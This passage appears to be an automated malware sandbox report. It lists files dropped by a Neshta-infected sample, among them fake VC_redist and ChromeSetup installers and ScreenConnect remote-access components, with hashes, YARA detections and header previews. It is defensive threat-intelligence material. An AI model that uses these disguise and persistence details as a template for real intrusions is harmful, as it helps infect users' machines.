                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.515754456132426
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCYRnRdeHrI7hzUg2Ewhwy9Lt0+du:sr85CYRnRCr8JUg+t95Ldu
                                                                        MD5:E1BDE940ECE6F7C7F80841740A907C05
                                                                        SHA1:188CE476AF1396E98E7D95EC6B3D22DADC85F9DE
                                                                        SHA-256:B4EDE55B8093B7E5BB26CF08684B3670B7890591FCCFBEC83AF2F79907401239
                                                                        SHA-512:EB025FB6495BC3D34BEDB05ED5120EE1097B9EE8B233A2AA3ED7806802B8DEE0C7F76D0C7A600CB0910BDD2962E4C3695B1D8D31198C85AD7F139F3EFB939979
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.562807885786494
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCKzw4jkfLZTxJtDSoieff:sr85CKEBfLzJtR
                                                                        MD5:933DB9DADE1B2ADDE200F742940F61C9
                                                                        SHA1:19208F6EE0F07F6BF61A9E8FA04BB6B299A2C512
                                                                        SHA-256:CFA2C4E5DC5AE16C510BC789B478D13F9EC05372DBADCE8C0E78A7DCFC16A3DC
                                                                        SHA-512:B98BDC38BEF6AFB8E6EF2230627290E0110875197625CCE0CC9CFD9A33954AD53F678148935442753E0E2D713DA17FDFD695E997ABFF45FBBCA22BD1F6B1C12D
                                                                        Malicious:true
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.51577139672898
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCkRnRdeHrI7hzUg2Ewhwy9Lt0+du:sr85CkRnRCr8JUg+t95Ldu
                                                                        MD5:60738E3D150CFDD2CD11C779ED82C473
                                                                        SHA1:ED9010E56426DD75DA04F45A22C6964A06DB52C0
                                                                        SHA-256:AD8620D29F365145B787B9225905089FA1205A6A67775BD36EE6FF66F9AE56EB
                                                                        SHA-512:F67BBBE6A8134E6342647AA03C7B59C2AA78D224DAE82B11D5EE5FC0B15BE90C30E604411E97E2E4E6E8B28D8424A2C9B0E10A130A5F21B4FA0C6A121A667D63
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.485564517117053
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCz9QHwtRF9YkjqOOdwtFR+9zAKEC2OoxAwMqc4:sr85CzIyRF9YkjqOOOB8zAK2OoxAwMqx
                                                                        MD5:6A3C227401357DD0ACEE2988511EC44C
                                                                        SHA1:2CB5F9BFC06F902D3B8ADCEBDF7A6DB5E8D1815A
                                                                        SHA-256:67FD35785411A8926559D94CF258C6CC40A1D2683B36CBD3E99124B43D3F4307
                                                                        SHA-512:A2A3F4E5FD748BF74A6CDE8674540AD893F7F8B6FFBD896E81911805DF9E8DC3CCDB832661DA8A7A5505F74EA81863593DDF7CF4759C1028846C4461EA0D8E71
                                                                        Malicious:true
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\$RUX313H.exe.log
                                                                        Process:C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):226
                                                                        Entropy (8bit):5.3467126928258955
                                                                        Encrypted:false
                                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                                        MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                                        SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                                        SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                                        SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                                        Malicious:true
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):746
                                                                        Entropy (8bit):5.3527160501124875
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhaOK9eDLI4MNJK9zKHK9yiP:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFT
                                                                        MD5:4EF5C487B6A253BA22FF6B9F0543D2A8
                                                                        SHA1:0C17B4E9B9EEBBA1E239D620552321182A2F792F
                                                                        SHA-256:E14BBB9471C4AAD8444B61E2DB5C08D08C88E18F4530248C19B3EBF3676C765F
                                                                        SHA-512:CC7857687809D749898792C874A54CA174D26AC0D2DE5FF699D280E3B4810D298EA03FE76C51F8191C9D636F7EE40D50F7A19E430A4E3BD40C86083EC0A7794F
                                                                        Malicious:false
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.5964179831347325
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3GoO5OLmk1uFQfI5367Kd8:sr85Cnm5Wi3h8
                                                                        MD5:49108FC1C6FF24CD49C200E2D7A44B86
                                                                        SHA1:E79038C6363781BF92D4487BD77A4A770352E948
                                                                        SHA-256:06197B71B98A7C4FC08B2B354B6B5DE011BA11CF958827BEE3438B170A27F17F
                                                                        SHA-512:008A7A84B3BC2337AF59260348076CDEE1F3C507AD2BF4D2C567029E1F12594555D2BDC4B9BEB2AE77B29E07F7F02158806DB196BB1878D9018E34E7A7757FA1
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):4235144
                                                                        Entropy (8bit):7.178988683349245
                                                                        Encrypted:false
                                                                        SSDEEP:49152:hbegT0+TL3Z0Mi963PSuIiH7efPKJqqLGVgM/1n7CJGcU3UPXGuI8Ewj1g+:M316Q6efPuPLC1n7CQcmIG7uN
                                                                        MD5:F405B7A5D5C7F37504067037D2CF44AE
                                                                        SHA1:F78E9E8F20346AC2FEC828D3E48EBA9BDB3D3AFB
                                                                        SHA-256:7EF82E0D15D6292A02449789655D3FBC1E774F34531E1CA342316B0C3F94C01F
                                                                        SHA-512:15890BBC34B013BA92353F8751C27A81EFB61668185EC95F6B41C5E1D8B4902CF2C772F824DE8C75922F5DEE32C7F76E055D1D08636F348713B3B66946F60277
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe, Author: Joe Security
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s....@...@...@.(....@.(....@.(....@..j...@..@...@...A...@.......@.......@.......@.Rich..@.........PE..L...F.*[......................>.....K.............@...........................>.......?...@.................................\...P.... ....=...........>.......>.x.......8...............................@...............8............................text....~.......................... ..`.rdata...R.......T..................@..@.data....,..........................@....rsrc.....=.. ....=.................@..@.reloc...(....>..*...x>.............@..B................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.265455130586502
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCnaBqYq8A5V626j2yk+w9PajrxWfv:sr85Cnas/8OUx2ykUGv
                                                                        MD5:BB762A775319A10BBC68B0EA9822F00E
                                                                        SHA1:6BE26E938DCC437BDE58003D1314412C1EAB6550
                                                                        SHA-256:1AC2F8C8F2D4F2257C9F762D44E760420940AE2E518DD4C5A2DD573077BB93A3
                                                                        SHA-512:1C1B1E23140987DFC728CC02F57F2BB8D39E00ABEEF34D0C13B67555CAB231B35C73C3004B3EAD84936903629FF25D4D42165A26D569DD2260895E2C17E3A1FE
                                                                        Malicious:true
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\MSIFE41.tmp
                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                        Category:dropped
                                                                        Size (bytes):340104
                                                                        Entropy (8bit):6.967776450044392
                                                                        Encrypted:false
                                                                        SSDEEP:6144:4UUG777hkC5WF5YKmzSnGSnpBC3dGx7WJcELgDwhIP+h5YavDGmah:4UUa/hku7KM4GSpkt07bDwfvvk
                                                                        MD5:7061F3A416C3A2973F4BF8497291D47A
                                                                        SHA1:3CE580CA5E6EFC01342AA5836AA85F1A4ADBF3D2
                                                                        SHA-256:7F97AF554506C7B0229C4269391AB418430D4EC08A379AC02A9F2344350665D1
                                                                        SHA-512:475600C1BF4D075436331FF6005439F5C570279112C5587E95D7D5C1C5817CD870FD55BAF4B226CCD8D83ABFCB217CCD31CFBF9EF144E294480AB208DA4CAB65
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\CustomAction.config
                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                        File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):228
                                                                        Entropy (8bit):5.069688959232011
                                                                        Encrypted:false
                                                                        SSDEEP:6:JiMVBdTMkI002VymRMT4/0xko57VrzW57VNQeuAW4QIT:MMHd41p2VymhsbOF93xT
                                                                        MD5:EB99EE012EB63C162EEBC1DF3A15990B
                                                                        SHA1:D48FD3B3B942C754E3588D91920670C087FCE7E9
                                                                        SHA-256:C5045C2D482F71215877EB668264EE47E1415792457F19A5A55651C3554CC7CD
                                                                        SHA-512:455EC01953EC27186FBEAD17C503B7F952474A80B41E986494697497ECEAB130AD81A5561373D6762B71EEC473D8E37CDE742F557E50233F7EB0E8FB8B0BE4AD
                                                                        Malicious:false
                                                                        Preview: .<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<startup useLegacyV2RuntimeActivationPolicy="true">....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>..</configuration>
                                                                        C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):176128
                                                                        Entropy (8bit):5.775360792482692
                                                                        Encrypted:false
                                                                        SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                        MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                        SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                        SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                        SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.Core.dll
                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):371200
                                                                        Entropy (8bit):5.9748911687895365
                                                                        Encrypted:false
                                                                        SSDEEP:6144:wplDccjhts4N+/Xon+LAM+tIVnF6nWpnPq8uiph/jISvVx4k4DEV7PX4:wp57joy7yAHtKnJlpx7f
                                                                        MD5:CA0F11FB4EC67C9B1EAF6B2D790830DA
                                                                        SHA1:4BDABF67897A2EF58E97AD4F96C5CA96AB846E28
                                                                        SHA-256:418E1EDEE0E84AFB4FF1A75AA1AEF204CEAAA4A54F67AB9829718775A6C9BE8A
                                                                        SHA-512:975B9704F5532A6ACA2BE23B8507AF3879CCE0441B0850784D6B4D8888DE86A0AFF1018A53D1A50AC5BBB210F1D47775525F1628950E2B8BDF8076C07A3D373B
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z].........." ..0.................. ........... ....................... ......".....@.................................h...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......T.............................................................."..s0...*&...s1...**....s2...*2......s3...*:........s4...*B..........s5...*>..}6.....}7...*&...(8...*2...(8......*2...(9......*2...(9......*>...(9.........*>...(9.........*N.{6....{7....s:...*R.{6....{7.....s;...*V.{6....{7......s<...*^.{6....{7........s=...*f.{6....{7..........s>...*z.{6....{7....{?....{@...s;...*..{6....{7....{A....{B....{C...s<...*..{6....{7....{D....{E....{F....{G...s=...*..{6....{7..
                                                                        C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.InstallerActions.dll
                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):17920
                                                                        Entropy (8bit):5.043548817128609
                                                                        Encrypted:false
                                                                        SSDEEP:384:BpRHsZ0S7sLxKnr1aN2GF8JrMXm1kjv+U5ydombDmz:BLsf7uxKnkNF82D5yJbDO
                                                                        MD5:5BD8E7A056CEEBED1E8DAF551084A2B0
                                                                        SHA1:877CA32D61A5826B53BC9C36583F24A983B15A6E
                                                                        SHA-256:FAFB3AAA1EB5CB6360B71C4EB70C2CBF4EE98B654C228CC463EBE738E033AAE5
                                                                        SHA-512:8924258C5ABDC33BACCCA55265CDC928CD2448D2A8D1CE162437D59859E326FAC4C459C366A0736F3C263E50DA4E5C2EA43438996E296F6539D3663A64F3B550
                                                                        Malicious:false
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z].........." ..0..>..........B]... ...`....... ....................................@..................................\..O....`............................................................................... ............... ..H............text...H=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................$]......H.......,-..D/..................p\.......................................0..........s.......}.....s....}.....{....r...p(......9.....{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%.....(...+~....%-.&~..........s....%.....(...+.......s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{....r}..po.....{....(.....{....o....-..{....r...p......(.....*s.......{....(......o.....,..(....o.....o ...,..o!...-..{....r...p...(....& C...*.{....r}.
                                                                        C:\Users\user\AppData\Local\Temp\setup.msi
                                                                        Process:C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {9C0A6111-B899-49EE-9A79-EF61274BA5E5}, Create Time/Date: Mon Aug 19 19:53:36 2019, Last Saved Time/Date: Mon Aug 19 19:53:36 2019, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):1839104
                                                                        Entropy (8bit):7.665524439620909
                                                                        Encrypted:false
                                                                        SSDEEP:24576:4Tfiq4qzGVgdUv///1hrpTlqqXC35GqprzUa8BbuJbMUUGGu7U8Ew8urhwQUv:CqqLGVgM/1n7CJGcU3UdXGuI8Ewj1g
                                                                        MD5:750E0020A6FC2FFF7B6E467F3E4E36C1
                                                                        SHA1:11B17909D9F294C7EC2586690E53AC37F4342379
                                                                        SHA-256:B1FB1DAF0443B9B7865F3F414CE0388440F8E47DD495FFB84B0252294AA8543B
                                                                        SHA-512:E0E7510B0D77468295BE026D84D7D731B32908C6A4A7635F607D6E2DFB5B577BBD8350E12A223549F1A1AB150FAE5DB1E67D60E38ACE915CA376F62005DA69B3
                                                                        Malicious:false
                                                                        Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Windows\Installer\5e0b03.msi
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {9C0A6111-B899-49EE-9A79-EF61274BA5E5}, Create Time/Date: Mon Aug 19 19:53:36 2019, Last Saved Time/Date: Mon Aug 19 19:53:36 2019, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):1839104
                                                                        Entropy (8bit):7.665524439620909
                                                                        Encrypted:false
                                                                        SSDEEP:24576:4Tfiq4qzGVgdUv///1hrpTlqqXC35GqprzUa8BbuJbMUUGGu7U8Ew8urhwQUv:CqqLGVgM/1n7CJGcU3UdXGuI8Ewj1g
                                                                        MD5:750E0020A6FC2FFF7B6E467F3E4E36C1
                                                                        SHA1:11B17909D9F294C7EC2586690E53AC37F4342379
                                                                        SHA-256:B1FB1DAF0443B9B7865F3F414CE0388440F8E47DD495FFB84B0252294AA8543B
                                                                        SHA-512:E0E7510B0D77468295BE026D84D7D731B32908C6A4A7635F607D6E2DFB5B577BBD8350E12A223549F1A1AB150FAE5DB1E67D60E38ACE915CA376F62005DA69B3
                                                                        Malicious:false
                                                                        Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Windows\Installer\5e0b05.msi
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {9C0A6111-B899-49EE-9A79-EF61274BA5E5}, Create Time/Date: Mon Aug 19 19:53:36 2019, Last Saved Time/Date: Mon Aug 19 19:53:36 2019, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):1839104
                                                                        Entropy (8bit):7.665524439620909
                                                                        Encrypted:false
                                                                        SSDEEP:24576:4Tfiq4qzGVgdUv///1hrpTlqqXC35GqprzUa8BbuJbMUUGGu7U8Ew8urhwQUv:CqqLGVgM/1n7CJGcU3UdXGuI8Ewj1g
                                                                        MD5:750E0020A6FC2FFF7B6E467F3E4E36C1
                                                                        SHA1:11B17909D9F294C7EC2586690E53AC37F4342379
                                                                        SHA-256:B1FB1DAF0443B9B7865F3F414CE0388440F8E47DD495FFB84B0252294AA8543B
                                                                        SHA-512:E0E7510B0D77468295BE026D84D7D731B32908C6A4A7635F607D6E2DFB5B577BBD8350E12A223549F1A1AB150FAE5DB1E67D60E38ACE915CA376F62005DA69B3
                                                                        Malicious:false
                                                                        Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Windows\Installer\MSI1045.tmp
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):207360
                                                                        Entropy (8bit):6.573348437503042
                                                                        Encrypted:false
                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                        Malicious:false
                                                                        Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                        C:\Windows\Installer\MSI11DE.tmp
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):207360
                                                                        Entropy (8bit):6.573348437503042
                                                                        Encrypted:false
                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                        Malicious:false
